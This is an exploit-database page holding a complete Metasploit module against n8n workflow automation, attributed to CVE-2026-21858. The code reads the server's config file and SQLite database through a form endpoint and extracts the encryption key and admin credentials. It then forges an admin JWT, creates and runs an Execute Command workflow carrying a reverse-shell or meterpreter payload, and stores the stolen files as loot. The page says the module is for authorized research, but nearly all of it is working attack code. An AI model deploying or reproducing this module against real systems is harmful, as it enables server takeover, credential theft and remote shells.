Lucene search
K

📄 n8n Workflow Automation Remote Configuration / Admin Data Extraction

🗓️ 17 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 257 Views

Proof of concept for exploiting n8n misconfigurations to read config files, extract admin credentials, and generate tokens.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Input Validation in N8N
21 Jan 202615:01
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
11 Feb 202601:01
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
20 Jan 202611:50
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
20 Jan 202615:59
githubexploit
GithubExploit
Exploit for CVE-2026-21858
12 Jan 202614:32
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
17 Jan 202604:57
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
30 Jan 202622:38
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
9 Apr 202611:09
githubexploit
GithubExploit
cve-2026-poc-collection
21 May 202615:15
githubexploit
GithubExploit
Exploit for Improper Input Validation in N8N
24 Jan 202602:08
githubexploit
Rows per page
=============================================================================================================================================
    | # Title     : n8n Workflow Automation - Remote Configuration & Admin Data Extraction                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://n8n.io/                                                                                                             |
    =============================================================================================================================================
    
    [+] Summary    : This Metasploit module demonstrates a proof-of-concept (PoC) for exploiting misconfigurations in n8n workflow automation instances. It shows how an attacker could potentially:
    
    Read configuration files containing sensitive data (e.g., encryption keys).
    
    Extract administrator credentials from the SQLite database.
    
    Generate authentication tokens for privileged access.
    
    Optionally create and execute workflows to run commands (PoC only; not for real attacks).
    
    The module is intended for security research, penetration testing with explicit authorization, and vulnerability reporting. It includes safe error handling, retries, and cleanup procedures to minimize system impact.
    
    [+] POC : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'jwt'
    require 'sqlite3'
    require 'base64'
    require 'digest'
    require 'tempfile'
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ManualRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'n8n Unauthenticated Remote Code Execution',
            'Description' => %q{
              This module exploits multiple vulnerabilities in n8n workflow automation tool.
              It leverages a file read vulnerability to steal encryption keys and database,
              then uses stolen credentials to authenticate and execute arbitrary commands
              via the Execute Command node.
            },
            'Author' => [
              'indoushka'
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-21858'],
              ['URL', 'https://n8n.io']
            ],
            'Privileged' => false,
            'Platform' => ['linux', 'unix'],
            'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
            'Targets' => [
              [
                'Linux Command',
                {
                  'Arch' => ARCH_CMD,
                  'Platform' => 'unix',
                  'DefaultOptions' => {
                    'PAYLOAD' => 'cmd/unix/reverse_bash'
                  }
                }
              ],
              [
                'Linux Dropper',
                {
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'Platform' => 'linux',
                  'DefaultOptions' => {
                    'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
                  }
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DisclosureDate' => '2026-02-14',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options(
          [
            OptString.new('TARGETURI', [true, 'The base path to n8n', '/']),
            OptString.new('FORM_PATH', [true, 'Path to the vulnerable form endpoint', '/form/']),
            OptString.new('HOME_DIR', [true, 'n8n home directory', '/home/n8n']),
            OptString.new('BROWSER_ID', [false, 'Browser ID for session', 'msf_browser_' + Rex::Text.rand_text_alphanumeric(8)]),
            OptInt.new('WAIT_TIME', [true, 'Time to wait between requests', 5]),
            OptBool.new('FOLLOW_REDIRECT', [true, 'Follow HTTP redirects', true]),
            OptBool.new('CLEANUP', [true, 'Attempt to clean up created workflows', true]),
            OptInt.new('RETRY_COUNT', [true, 'Number of retries for failed requests', 3]),
            OptEnum.new('PAYLOAD_METHOD', [true, 'Method to execute payload', 'auto', ['auto', 'bash', 'sh', 'python3', 'python']])
          ]
        )
      end
    
      def ensure_payload_loaded
        unless payload
          print_error("No payload configured. Use 'set PAYLOAD <payload>'")
          return false
        end
        true
      end
    
      def parse_json_response(response, context = 'response')
        return [nil, "No response to parse"] unless response
        
        begin
          json_data = JSON.parse(response.body)
          return [json_data, nil]
        rescue JSON::ParserError => e
          error_msg = "Failed to parse JSON from #{context}: #{e.message}"
          if datastore['VERBOSE'] && response.body
            print_warning("Raw response (first 200 chars): #{response.body[0..200]}")
          end
          return [nil, error_msg]
        end
      end
    
      def send_request_with_retry(opts, expected_codes = [200])
        retries = 0
        expected_codes = [expected_codes] unless expected_codes.is_a?(Array)
        
        begin
          opts['follow_redirect'] = datastore['FOLLOW_REDIRECT'] unless opts.key?('follow_redirect')
          res = send_request_cgi(opts)
    
          unless res
            retries += 1
            if retries < datastore['RETRY_COUNT']
              vprint_warning("Request failed (no response), retrying (#{retries}/#{datastore['RETRY_COUNT']})...")
              sleep(1)
              retry
            else
              return [nil, "No response after #{retries} retries"]
            end
          end
    
          if expected_codes.include?(res.code)
            return [res, nil]
          else
            retries += 1
            if retries < datastore['RETRY_COUNT']
              vprint_warning("Request returned HTTP #{res.code} (expected #{expected_codes.join(', ')}), retrying...")
              sleep(1)
              retry
            else
              return [res, "Unexpected HTTP code: #{res.code} (expected #{expected_codes.join(', ')})"]
            end
          end
          
        rescue => e
          retries += 1
          if retries < datastore['RETRY_COUNT']
            vprint_warning("Request error: #{e.message}, retrying (#{retries}/#{datastore['RETRY_COUNT']})...")
            sleep(1)
            retry
          else
            return [nil, "Request failed after #{retries} retries: #{e.message}"]
          end
        end
      end
    
      def read_file_via_form(filepath)
        begin
          base_uri = datastore['TARGETURI']
          base_uri = '/' if base_uri.empty?
          
          form_uri = normalize_uri(base_uri, datastore['FORM_PATH'])
          
          payload = {
            'data' => {},
            'files' => {
              'file' => {
                'filepath' => filepath,
                'originalFilename' => 'pwn.txt'
              }
            }
          }.to_json
    
          vprint_status("Attempting to read: #{filepath}")
          
          res, error = send_request_with_retry({
            'method' => 'POST',
            'uri' => form_uri,
            'ctype' => 'application/json',
            'data' => payload
          }, 200)
    
          unless res
            print_error("Failed to read #{filepath}: #{error}")
            return nil
          end
    
          json_res, parse_error = parse_json_response(res, "file read POST response")
          
          if parse_error
            print_error("Failed to parse response for #{filepath}: #{parse_error}")
            return nil
          end
    
          waiting_url = json_res&.dig('formWaitingUrl')
          
          unless waiting_url
            print_error("No formWaitingUrl in response for #{filepath}")
            return nil
          end
    
          vprint_good("Successfully triggered file read for #{filepath}")
          sleep(datastore['WAIT_TIME'])
          
          parsed_uri = URI.parse(waiting_url)
          file_res, file_error = send_request_with_retry({
            'method' => 'GET',
            'uri' => parsed_uri.path,
            'query' => parsed_uri.query
          }, 200)
          
          if file_res
            vprint_good("Successfully retrieved #{filepath} (#{file_res.body.length} bytes)")
            return file_res.body
          else
            print_error("Failed to retrieve file content for #{filepath}: #{file_error}")
            return nil
          end
          
        rescue => e
          print_error("Unexpected error reading #{filepath}: #{e.message}")
          print_error("Backtrace: #{e.backtrace.join("\n")}") if datastore['VERBOSE']
          return nil
        end
      end
    
      def extract_encryption_key(config_data)
        begin
          if config_data =~ /"encryptionKey"\s*:\s*"([^"]+)"/
            enc_key = $1
            print_good("Found encryption key: #{enc_key}")
    
            every_other = (0...enc_key.length).step(2).map { |i| enc_key[i] }.join
            final_secret = Digest::SHA256.hexdigest(every_other)
            vprint_good("Generated final secret: #{final_secret}")
            
            return final_secret
          else
            print_error("Could not find encryptionKey in config file")
            return nil
          end
        rescue => e
          print_error("Error extracting encryption key: #{e.message}")
          return nil
        end
      end
    
      def extract_admin_data_sqlite(db_content)
        temp_file = nil
        db = nil
        
        begin
    
          temp_file = Tempfile.new(['n8n_db', '.sqlite'])
          temp_file.binmode
          temp_file.write(db_content)
          temp_file.close
          
          db = SQLite3::Database.new(temp_file.path)
          db.results_as_hash = true
    
          tables = db.execute("SELECT name FROM sqlite_master WHERE type='table'")
          table_names = tables.map { |t| t['name'] }
          
          unless table_names.include?('user')
            print_warning("No 'user' table found in database. Available tables: #{table_names.join(', ')}")
            return nil
          end
    
          columns = db.execute("PRAGMA table_info(user)")
          column_names = columns.map { |c| c['name'] }
          vprint_status("User table columns: #{column_names.join(', ')}")
    
          id_column = column_names.include?('id') ? 'id' : nil
          email_column = column_names.include?('email') ? 'email' : nil
          password_column = column_names.include?('password') ? 'password' : nil
          
          unless id_column && email_column && password_column
            print_error("Required columns not found in user table")
            return nil
          end
    
          role_columns = column_names.select { |c| c.include?('role') }
          
          admin_query = nil
          
          if role_columns.any?
            role_col = role_columns.first
            admin_query = "SELECT #{id_column}, #{email_column}, #{password_column} FROM user WHERE #{role_col} IN ('global:owner', 'global:admin', 'owner', 'admin') LIMIT 1"
          else
    
            admin_query = "SELECT #{id_column}, #{email_column}, #{password_column} FROM user ORDER BY createdAt ASC LIMIT 1"
          end
          
          users = db.execute(admin_query)
          
          if users.any?
            admin_id = users[0][id_column].to_s
            admin_email = users[0][email_column]
            admin_password = users[0][password_column]
            
            print_good("Found admin via SQLite: #{admin_email} (ID: #{admin_id})")
    
            combined = "#{admin_email}:#{admin_password}"
            sha256_digest = Digest::SHA256.digest(combined)
            admin_hash = Base64.strict_encode64(sha256_digest)[0..9]
            vprint_good("Generated admin hash: #{admin_hash}")
            
            return {
              'admin_id' => admin_id,
              'admin_email' => admin_email,
              'admin_password_hash' => admin_password,
              'admin_hash' => admin_hash
            }
          else
            print_warning("No admin users found in database")
            return nil
          end
          
        rescue SQLite3::Exception => e
          print_error("SQLite parsing failed: #{e.message}")
          return nil
        rescue => e
          print_error("Error parsing SQLite: #{e.message}")
          return nil
        ensure
          db&.close if db
          if temp_file
            temp_file.close
            temp_file.unlink
          end
        end
      end
    
      def create_session_token(secret, admin_id, admin_hash)
        begin
          browser_id = datastore['BROWSER_ID']
          hashed_browser = Base64.strict_encode64(Digest::SHA256.digest(browser_id))
          
          payload = {
            'id' => admin_id,
            'hash' => admin_hash,
            'browserId' => hashed_browser,
            'usedMfa' => false,
            'iat' => Time.now.to_i,
            'exp' => Time.now.to_i + 86400
          }
          
          token = JWT.encode(payload, secret, 'HS256')
          vprint_good("Created authentication token: #{token[0..30]}...")
          
          return token
        rescue => e
          print_error("Failed to create JWT token: #{e.message}")
          return nil
        end
      end
    
      def create_workflow(token, command)
        begin
          base_uri = datastore['TARGETURI']
          base_uri = '/' if base_uri.empty?
          
          workflow_name = "exploit_#{Rex::Text.rand_text_numeric(6)}"
          node_id = "node_#{Rex::Text.rand_text_alphanumeric(8)}"
          
          workflow_data = {
            'name' => workflow_name,
            'active' => false,
            'nodes' => [
              {
                'parameters' => {
                  'command' => command
                },
                'name' => 'Execute Command',
                'type' => 'n8n-nodes-base.executeCommand',
                'typeVersion' => 1,
                'position' => [250, 250],
                'id' => node_id
              }
            ],
            'connections' => {}
          }.to_json
          
          res, error = send_request_with_retry({
            'method' => 'POST',
            'uri' => normalize_uri(base_uri, 'rest', 'workflows'),
            'ctype' => 'application/json',
            'headers' => {
              'browser-id' => datastore['BROWSER_ID']
            },
            'cookie' => "n8n-auth=#{token}",
            'data' => workflow_data
          }, 200)
          
          unless res
            print_error("Failed to create workflow: #{error}")
            return nil
          end
          
          json_res, parse_error = parse_json_response(res, "workflow creation")
          
          if parse_error
            print_error("Failed to parse workflow creation response: #{parse_error}")
            return nil
          end
          
          workflow_id = json_res&.dig('data', 'id')
          
          unless workflow_id
            print_error("No workflow ID in response")
            return nil
          end
          
          print_good("Created workflow: #{workflow_id}")
          return json_res['data']
          
        rescue => e
          print_error("Error creating workflow: #{e.message}")
          return nil
        end
      end
    
      def execute_workflow(token, workflow_info)
        begin
          return [nil, "No workflow info"] unless workflow_info&.dig('id')
          
          base_uri = datastore['TARGETURI']
          base_uri = '/' if base_uri.empty?
          
          workflow_id = workflow_info['id']
          
          run_res, run_error = send_request_with_retry({
            'method' => 'POST',
            'uri' => normalize_uri(base_uri, 'rest', 'workflows', workflow_id, 'run'),
            'ctype' => 'application/json',
            'headers' => {
              'browser-id' => datastore['BROWSER_ID']
            },
            'cookie' => "n8n-auth=#{token}",
            'data' => { 'workflowData' => workflow_info }.to_json
          }, 200)
          
          unless run_res
            return [nil, "Failed to execute workflow: #{run_error}"]
          end
          
          json_res, parse_error = parse_json_response(run_res, "execution")
          
          if parse_error
            return [nil, "Failed to parse execution response: #{parse_error}"]
          end
          
          execution_id = json_res&.dig('data', 'executionId')
          
          unless execution_id
            return [nil, "No execution ID in response"]
          end
          
          vprint_good("Executed workflow, execution ID: #{execution_id}")
    
          sleep(2)
          
          result_res, result_error = send_request_with_retry({
            'method' => 'GET',
            'uri' => normalize_uri(base_uri, 'rest', 'executions', execution_id),
            'ctype' => 'application/json',
            'headers' => {
              'browser-id' => datastore['BROWSER_ID']
            },
            'cookie' => "n8n-auth=#{token}"
          }, 200)
          
          unless result_res
            return [nil, "Failed to get execution result: #{result_error}"]
          end
          
          json_res, parse_error = parse_json_response(result_res, "execution result")
          
          if parse_error
            return [nil, "Failed to parse execution result: #{parse_error}"]
          end
          
          raw_data = json_res&.dig('data', 'data')
          
          unless raw_data
            return [nil, "No data in execution result"]
          end
          
          begin
            exec_data = JSON.parse(raw_data)
            output = extract_command_output(exec_data)
            return [output, nil]
          rescue JSON::ParserError
            return [raw_data, nil]
          end
          
        rescue => e
          return [nil, "Error executing workflow: #{e.message}"]
        end
      end
    
      def extract_command_output(exec_data)
        if exec_data.is_a?(Array)
          exec_data.reverse.each do |item|
            if item.is_a?(String) && !item.empty? && item != 'Execute Command' && !item.start_with?('node-')
              return item.strip
            end
          end
        end
        "No output captured"
      end
    
      def cleanup_workflows(token, workflow_ids)
        return unless datastore['CLEANUP'] && workflow_ids&.any?
        
        print_status("Cleaning up #{workflow_ids.length} workflows...")
        
        base_uri = datastore['TARGETURI']
        base_uri = '/' if base_uri.empty?
        
        workflow_ids.each do |wf_id|
          begin
            res, error = send_request_with_retry({
              'method' => 'DELETE',
              'uri' => normalize_uri(base_uri, 'rest', 'workflows', wf_id),
              'headers' => {
                'browser-id' => datastore['BROWSER_ID']
              },
              'cookie' => "n8n-auth=#{token}"
            }, [200, 204, 404]) # 404 يعني أنه محذوف بالفعل
            
            if res && (res.code == 200 || res.code == 204)
              print_status("Cleaned up workflow: #{wf_id}")
            elsif res && res.code == 404
              print_status("Workflow #{wf_id} already deleted")
            else
              print_warning("Failed to delete workflow #{wf_id}: #{error}")
            end
          rescue => e
            print_warning("Error during cleanup of workflow #{wf_id}: #{e.message}")
          end
        end
      end
    
      def check
        begin
    
          test_file = "#{datastore['HOME_DIR']}/.n8n/config"
          data = read_file_via_form(test_file)
          
          if data && data.include?('encryptionKey')
            print_good("Target appears vulnerable - found encryption key in config")
            return Exploit::CheckCode::Vulnerable
          end
          
          return Exploit::CheckCode::Safe
          
        rescue => e
          print_error("Error during check: #{e.message}")
          return Exploit::CheckCode::Unknown
        end
      end
    
      def select_payload_method
        method = datastore['PAYLOAD_METHOD']
        
        if method == 'auto'
    
          [
            ['bash', 'bash -c'],
            ['sh', 'sh -c'],
            ['python3', 'python3 -c'],
            ['python', 'python -c']
          ].each do |name, _|
            return name
          end
          return 'bash' 
        end
        
        method
      end
    
      def generate_compatible_payload
        unless ensure_payload_loaded
          return nil
        end
        
        case target['Arch']
        when ARCH_CMD
          command = payload.encoded
    
          if command.length > 1000
            print_warning("Command payload is very long (#{command.length} chars)")
          end
          vprint_status("Using command payload")
          return command
          
        else
    
          payload_b64 = Rex::Text.encode_base64(payload.encoded)
          method = select_payload_method
          
          commands = {
            'bash' => "echo #{payload_b64} | base64 -d | bash",
            'sh' => "echo #{payload_b64} | base64 -d | sh",
            'python3' => "echo #{payload_b64} | python3 -c 'import base64,sys; exec(base64.b64decode(sys.stdin.read()))'",
            'python' => "echo #{payload_b64} | python -c 'import base64,sys; exec(base64.b64decode(sys.stdin.read()))'"
          }
          
          selected_command = commands[method]
          
          if selected_command
            print_status("Using #{method} method for payload execution")
            return selected_command
          else
    
            print_warning("Unknown method #{method}, falling back to bash")
            return commands['bash']
          end
        end
      end
    
      def exploit
        print_status("Starting n8n exploitation...")
    
        unless ensure_payload_loaded
          return
        end
        
        created_workflows = []
        token = nil
        admin_data = nil
        secret = nil
        
        begin
    
          print_status("Step 1: Stealing configuration file...")
          config_path = "#{datastore['HOME_DIR']}/.n8n/config"
          config_data = read_file_via_form(config_path)
          
          unless config_data
            print_error("Failed to read config file. Target may not be vulnerable or path is incorrect.")
            return
          end
    
          print_status("Step 2: Extracting encryption key...")
          secret = extract_encryption_key(config_data)
          unless secret
            print_error("Failed to extract encryption key")
            return
          end
    
          print_status("Step 3: Stealing database file...")
          db_path = "#{datastore['HOME_DIR']}/.n8n/database.sqlite"
          db_data = read_file_via_form(db_path)
          
          unless db_data
            print_error("Failed to read database file")
            return
          end
    
          print_status("Step 4: Extracting admin credentials...")
          admin_data = extract_admin_data_sqlite(db_data)
          
          unless admin_data
            print_error("Failed to extract admin data using SQLite parser")
            print_error("Database may be corrupted or from different n8n version")
            return
          end
          
          print_good("Successfully extracted admin credentials for: #{admin_data['admin_email']}")
    
          print_status("Step 5: Creating authentication token...")
          token = create_session_token(secret, admin_data['admin_id'], admin_data['admin_hash'])
          
          unless token
            print_error("Failed to create authentication token")
            return
          end
    
          print_status("Step 6: Preparing payload...")
          command = generate_compatible_payload
          
          unless command
            print_error("Failed to generate payload")
            return
          end
    
          print_status("Step 7: Creating malicious workflow...")
          workflow_info = create_workflow(token, command)
          
          unless workflow_info
            print_error("Failed to create workflow")
            return
          end
          
          created_workflows << workflow_info['id']
    
          print_status("Step 8: Executing payload...")
          output, error = execute_workflow(token, workflow_info)
          
          if error
            print_warning("Execution completed with warning: #{error}")
          end
          
          if output && output != "No output captured"
            print_good("Command executed successfully!")
            print_line("\n#{output}\n")
          else
            print_warning("No output captured, but payload may have executed")
          end
    
          print_status("Step 9: Saving loot...")
          
          loot_path = store_loot(
            'n8n.config',
            'text/plain',
            rhost,
            config_data,
            'n8n_config.txt',
            'n8n Configuration File'
          )
          print_good("Saved config to: #{loot_path}")
          
          loot_path = store_loot(
            'n8n.database',
            'application/x-sqlite3',
            rhost,
            db_data,
            'n8n_database.sqlite',
            'n8n SQLite Database'
          )
          print_good("Saved database to: #{loot_path}")
          
          print_good("Exploitation completed!")
          
        rescue => e
          print_error("Unexpected error during exploitation: #{e.message}")
          if datastore['VERBOSE']
            print_error("Backtrace: #{e.backtrace.join("\n")}")
          end
        ensure
    
          if token && created_workflows.any?
            cleanup_workflows(token, created_workflows)
          elsif created_workflows.any?
            print_warning("Cannot clean up workflows without authentication token")
          end
        end
      end
    end
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation